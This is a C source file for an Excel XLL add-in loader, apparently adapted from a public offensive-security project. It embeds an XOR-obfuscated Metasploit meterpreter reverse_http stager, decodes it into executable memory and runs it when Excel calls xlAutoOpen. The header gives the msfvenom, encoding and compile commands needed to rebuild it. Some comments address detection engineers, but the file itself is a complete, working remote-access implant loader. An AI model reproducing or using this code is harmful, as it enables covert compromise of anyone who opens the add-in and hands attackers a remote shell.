
shellcode_multibyteXOR_ExcelRegisterXLL.c

// Compile with:
//		cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Generate the raw (unencoded) x86 reverse_http stager. Note: EnableStageEncoding/StageEncoder
//    apply to the stage the handler sends back over HTTP, not to the stager bytes embedded below:
//		msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encode it with a repeating multibyte XOR key (https://github.com/Arno0x/ShellcodeWrapper).
//    This is obfuscation, not encryption: the key is stored as a plain string literal in the
//    resulting binary (see key[] below) and the stager is trivially recoverable by static analysis:
//		./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor

#include <Windows.h>

/* Exported by name so the XLL loader can resolve xlAutoOpen; the definition is below. */
__declspec(dllexport) void __cdecl xlAutoOpen(void); 

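/*
 * Thread body: XOR-decodes the embedded stager into an RWX region and
 * transfers control to it.
 *
 * lpParameter: unused (xlAutoOpen passes NULL).
 * Returns 0 if the executable region could not be allocated, 1 if the
 * payload ever returns control (it is presumably not expected to).
 *
 * Notes for analysts / detection engineers:
 *  - key[] ("testkey") and the ciphertext are plain string literals in
 *    the module, so the repeating-key XOR is obfuscation only; the first
 *    decoded bytes are fc e8 82 00 00 00 (cld; call ...), the usual start
 *    of the Metasploit x86 stager.
 *  - The decoded bytes stay on this thread's stack (shellcode[]) and in a
 *    never-freed PAGE_EXECUTE_READWRITE region (exec) for the life of the
 *    process.
 *  - RWX VirtualAlloc + memcpy + indirect call on a thread started from
 *    xlAutoOpen is the observable behaviour to key detections on.
 */
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
	/* Ciphertext and key as emitted by shellcode_encoder.py (see header). */
	unsigned char encryptedShellcode[] = "\x88\x8d\xf1\x74\x6b\x65\x19\xfd\x80\x42\xb4\x0f\xee\x29\x44\xee\x21\x78\xe0\x37\x6d\xff\x17\x5b\x7b\xdc\x2f\x5f\x45\x9a\xdf\x48\x0a\x19\x7b\x58\x45\xb2\xbb\x66\x64\xbe\x96\x97\x21\x23\xe0\x37\x69\xff\x2f\x4f\xff\x27\x74\x01\x97\x2d\x72\xa5\x3a\xee\x20\x54\x64\xa0\xff\x22\x7d\x9a\x4e\x2c\xf8\x40\xe0\x64\xaf\x45\x9a\xdf\xb5\xa4\x68\x78\xb3\x5d\x93\x01\x9d\x66\x04\x8c\x5e\x0e\x50\x1e\x81\x21\xff\x3d\x57\x75\xb8\x03\xf2\x78\x2e\xf8\x2c\x77\x64\xaa\xff\x61\xf8\x75\xbb\xec\x3d\x50\x41\x28\x2f\x0a\x3c\x23\x25\x9a\x93\x2b\x34\x3f\xf2\x66\x8e\xfe\x29\x03\x0b\x1c\x00\x65\x1b\x03\x02\x0b\x10\x20\x0d\x3f\x03\x4d\x62\x86\xa1\x54\xa8\x27\x38\x36\x2a\x27\x0d\x49\x22\x12\xc2\x86\xa1\x36\x20\x1e\x68\x36\x2a\x1e\x35\x9b\xe3\x6b\x65\x79\x5b\x2c\x2c\x44\x09\x3d\x33\x1d\x1f\x36\x23\x5a\x0d\x2c\x19\x27\x27\x3b\x28\x33\x32\x3f\x24\x34\x02\x39\x0c\x4c\x18\x48\x01\x20\x13\x5c\x30\x46\x27\x16\x06\x6b\x35\x11\x23\xec\xec\xb2\x94\xb0\xf0\xb2\x36\x1b\x74\x69\x05\xfd\x27\x36\x20\x23\x38\x33\x11\x9f\x30\x5d\x4f\x94\xb0\xef\x1e\x6f\x2c\x27\x38\x36\x2a\x22\x0d\x5e\x72\x73\x1e\x86\xa1\xe0\xb3\x01\x63\x2a\x0c\x99\x8d\x3f\x74\x6b\x65\x13\x34\x0d\x73\x64\x6b\x65\x11\x74\x65\x33\x74\x38\x0d\x21\xd0\x36\x96\x8b\xbe\xf6\x2a\x27\xec\x94\x23\x03\x65\x59\x74\x65\x20\x22\x03\x77\xef\xfd\x87\x8c\xa1\xee\xa5\x0d\xbb\xee\x74\x75\xa8\xe0\xb9\x01\x80\x2b\xb7\x34\x8d\xf2\x8b\x9a\x8c\x15\x05\x1c\x57\x03\x00\x11\x07\x02\x11\x1c\x5a\x06\x1c\x19\x6b\xde\x89\xc1\xc7\x25\x1e\x6b\x36\x86\xa1";
	unsigned char key[] = "testkey";
	/* sizeof counts the literal's terminating NUL; that byte is decoded and
	 * copied along with the payload, exactly as in the original listing. */
	const size_t len = sizeof encryptedShellcode;
	const size_t keylen = sizeof key - 1;	/* key length without its NUL */
	unsigned char shellcode[sizeof encryptedShellcode];
	void *exec;
	size_t i;

	(void)lpParameter;

	/* Repeating-key XOR: byte i is combined with key[i mod keylen]. */
	for (i = 0; i < len; i++)
		shellcode[i] = encryptedShellcode[i] ^ key[i % keylen];

	/* One committed RWX region sized to the whole payload. */
	exec = VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (exec == NULL)
		return 0;	/* allocation failed: do not memcpy into NULL */

	memcpy(exec, shellcode, len);

	/* Transfer control to the decoded stager. */
	((void (*)(void))exec)();

	return 1;
}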

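/*
 * Exported XLL entry point. Given the filename and the export, this is
 * presumably what Excel's add-in loader calls on registration (not
 * verified here). It starts the payload on a separate thread so this call
 * returns immediately, and drops the thread handle because nothing waits
 * on or inspects the thread afterwards.
 */
void __cdecl xlAutoOpen()
{
	HANDLE threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);

	/* CreateThread returns NULL on failure; only close a real handle. */
	if (threadHandle != NULL)
		CloseHandle(threadHandle);
}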

/*
 * DLL entry point. Deliberately does nothing on process/thread attach or
 * detach: the payload is started only from the exported xlAutoOpen, so
 * merely mapping the module (DllMain alone) does not run it. Always
 * reports success so the loader keeps the module mapped.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
	/* All parameters are intentionally unused. */
	(void)hModule;
	(void)ul_reason_for_call;
	(void)lpReserved;
	return TRUE;
}